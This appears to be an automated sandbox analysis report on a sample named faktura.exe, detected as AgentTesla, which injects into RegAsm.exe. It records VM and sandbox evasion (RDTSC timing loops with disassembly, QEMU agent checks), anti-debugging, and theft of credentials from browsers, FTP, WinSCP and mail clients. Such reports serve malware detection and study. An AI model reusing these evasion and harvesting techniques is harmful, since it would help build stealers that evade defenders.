Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA1E61 InternetOpenA,InternetOpenUrlA,	3_2_00FA1E61
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA1872 LoadLibraryA,	3_2_00FA1872
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA3135	3_2_00FA3135

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E19DF second address: 00000000022E19DF instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1AB4 second address: 00000000022E1AB4 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FC25CB35468h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp edx, eax 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 cmp ecx, 00000000h 0x00000026 jne 00007FC25CB35451h 0x00000028 push ecx 0x00000029 call 00007FC25CB3547Bh 0x0000002e call 00007FC25CB35478h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E323E second address: 00000000022E323E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a inc ecx 0x0000000b inc ebx 0x0000000c test ax, bx 0x0000000f cmp dword ptr [ebx], 9090C350h 0x00000015 jne 00007FC25CB3547Ah 0x00000017 cmp edx, dword ptr [ebx] 0x00000019 jne 00007FC25CB3546Fh 0x0000001b cmp byte ptr [ebx], FFFFFFE8h 0x0000001e jne 00007FC25CB35495h 0x00000020 cmp byte ptr [ebx], FFFFFFB8h 0x00000023 jne 00007FC25CB35484h 0x00000025 cmp ecx, 00002000h 0x0000002b jne 00007FC25CB353BAh 0x00000031 pushad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E329B second address: 00000000022E329B instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2061 second address: 00000000022E2061 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E20E2 second address: 00000000022E20E2 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E215F second address: 00000000022E215F instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E21EA second address: 00000000022E21EA instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2269 second address: 00000000022E2269 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E17DC second address: 00000000022E17DC instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1801 second address: 00000000022E1801 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1853 second address: 00000000022E1853 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E18F4 second address: 00000000022E18F4 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1944 second address: 00000000022E1944 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E174B second address: 00000000022E174B instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E178A second address: 00000000022E2BE5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f pushad 0x00000010 mov di, B712h 0x00000014 cmp di, B712h 0x00000019 jne 00007FC25C88A09Bh 0x0000001f popad 0x00000020 ret 0x00000021 cmp eax, 00000539h 0x00000026 je 00007FC25C888C66h 0x00000028 call 00007FC25C88998Ah 0x0000002d test ah, dh 0x0000002f test ch, dh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 cmp ah, ah 0x00000037 push dword ptr [ebp+24h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 cmp ecx, ecx 0x00000042 push 00000000h 0x00000044 call 00007FC25C88A9FCh 0x00000049 test ah, bh 0x0000004b test cx, 8861h 0x00000050 mov ecx, dword ptr [ebp+1Ch] 0x00000053 mov edx, 321C9581h 0x00000058 call 00007FC25C8886FAh 0x0000005d push esi 0x0000005e push edx 0x0000005f push ecx 0x00000060 test edx, 8DD1A303h 0x00000066 cmp eax, 00000539h 0x0000006b jne 00007FC25C888CC8h 0x0000006d test dh, FFFFFFEBh 0x00000070 pushad 0x00000071 lfence 0x00000074 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1F71 second address: 0000000000FA1F71 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1FE8 second address: 0000000000FA1FE8 instructions:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Function Chain: systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed,threadDelayed

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\faktura.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEF9
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E19DF second address: 00000000022E19DF instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1AB4 second address: 00000000022E1AB4 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FC25CB35468h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp edx, eax 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 dec ecx 0x00000023 cmp ecx, 00000000h 0x00000026 jne 00007FC25CB35451h 0x00000028 push ecx 0x00000029 call 00007FC25CB3547Bh 0x0000002e call 00007FC25CB35478h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1B6D second address: 00000000022E1B6D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FC25C88A05Ch 0x0000001d popad 0x0000001e call 00007FC25C888C89h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E323E second address: 00000000022E323E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a inc ecx 0x0000000b inc ebx 0x0000000c test ax, bx 0x0000000f cmp dword ptr [ebx], 9090C350h 0x00000015 jne 00007FC25CB3547Ah 0x00000017 cmp edx, dword ptr [ebx] 0x00000019 jne 00007FC25CB3546Fh 0x0000001b cmp byte ptr [ebx], FFFFFFE8h 0x0000001e jne 00007FC25CB35495h 0x00000020 cmp byte ptr [ebx], FFFFFFB8h 0x00000023 jne 00007FC25CB35484h 0x00000025 cmp ecx, 00002000h 0x0000002b jne 00007FC25CB353BAh 0x00000031 pushad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E329B second address: 00000000022E329B instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2D55 second address: 00000000022E2D55 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp ecx, 18h 0x0000000e jne 00007FC25CB35437h 0x00000010 test ch, ah 0x00000012 fnop 0x00000014 push dword ptr [eax+ecx] 0x00000017 pop dword ptr [ebx+ecx] 0x0000001a inc ecx 0x0000001b inc ecx 0x0000001c inc ecx 0x0000001d inc ecx 0x0000001e test edx, 39F97FE6h 0x00000024 test dh, FFFFFFE8h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2061 second address: 00000000022E2061 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E20E2 second address: 00000000022E20E2 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E215F second address: 00000000022E215F instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E21EA second address: 00000000022E21EA instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2253 second address: 00000000022E2269 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+00000120h], eax 0x00000009 test ecx, ecx 0x0000000b test ah, ah 0x0000000d mov ecx, dword ptr [ebp+18h] 0x00000010 mov edx, 71019921h 0x00000015 pushad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E2269 second address: 00000000022E2269 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E17DC second address: 00000000022E17DC instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1801 second address: 00000000022E1801 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1853 second address: 00000000022E1853 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E18F4 second address: 00000000022E18F4 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E1944 second address: 00000000022E1944 instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E174B second address: 00000000022E174B instructions:
Source: C:\Users\user\Desktop\faktura.exe	RDTSC instruction interceptor: First address: 00000000022E178A second address: 00000000022E2BE5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, 00000539h 0x0000000f pushad 0x00000010 mov di, B712h 0x00000014 cmp di, B712h 0x00000019 jne 00007FC25C88A09Bh 0x0000001f popad 0x00000020 ret 0x00000021 cmp eax, 00000539h 0x00000026 je 00007FC25C888C66h 0x00000028 call 00007FC25C88998Ah 0x0000002d test ah, dh 0x0000002f test ch, dh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 cmp ah, ah 0x00000037 push dword ptr [ebp+24h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 cmp ecx, ecx 0x00000042 push 00000000h 0x00000044 call 00007FC25C88A9FCh 0x00000049 test ah, bh 0x0000004b test cx, 8861h 0x00000050 mov ecx, dword ptr [ebp+1Ch] 0x00000053 mov edx, 321C9581h 0x00000058 call 00007FC25C8886FAh 0x0000005d push esi 0x0000005e push edx 0x0000005f push ecx 0x00000060 test edx, 8DD1A303h 0x00000066 cmp eax, 00000539h 0x0000006b jne 00007FC25C888CC8h 0x0000006d test dh, FFFFFFEBh 0x00000070 pushad 0x00000071 lfence 0x00000074 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1B6D second address: 0000000000FA1B6D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FC25CB3684Ch 0x0000001d popad 0x0000001e call 00007FC25CB35479h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1F5C second address: 0000000000FA1F71 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 test ecx, ecx 0x00000006 push 00010000h 0x0000000b test ah, ah 0x0000000d push ebx 0x0000000e push dword ptr [ebp+000000ECh] 0x00000014 pushad 0x00000015 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1F71 second address: 0000000000FA1F71 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000FA1FE8 second address: 0000000000FA1FE8 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 3_2_00FA2BCE rdtsc

3_2_00FA2BCE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Window / User API: threadDelayed 584

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6860	Thread sleep time: -17520000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6860	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6860	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.904555277.0000000000FA1000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exef9
Source: RegAsm.exe, 00000003.00000002.909289301.0000000020290000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000003.00000002.909289301.0000000020290000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000003.00000002.909289301.0000000020290000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000003.00000002.909289301.0000000020290000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\faktura.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\faktura.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 3_2_00FA2BCE rdtsc

3_2_00FA2BCE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 3_2_1FEEF950 LdrInitializeThunk,

3_2_1FEEF950

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA19C4 mov eax, dword ptr fs:[00000030h]	3_2_00FA19C4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA2D79 mov eax, dword ptr fs:[00000030h]	3_2_00FA2D79
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA2B62 mov eax, dword ptr fs:[00000030h]	3_2_00FA2B62
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 3_2_00FA3135 mov eax, dword ptr fs:[00000030h]	3_2_00FA3135

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\faktura.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: FA0000

Jump to behavior

Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'			Jump to behavior
Source: C:\Users\user\Desktop\faktura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\faktura.exe'			Jump to behavior

Source: RegAsm.exe, 00000003.00000002.904927890.0000000001760000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000003.00000002.904927890.0000000001760000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000003.00000002.904927890.0000000001760000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000003.00000002.904927890.0000000001760000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 3_2_00FA18E7 cpuid

3_2_00FA18E7

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6148, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
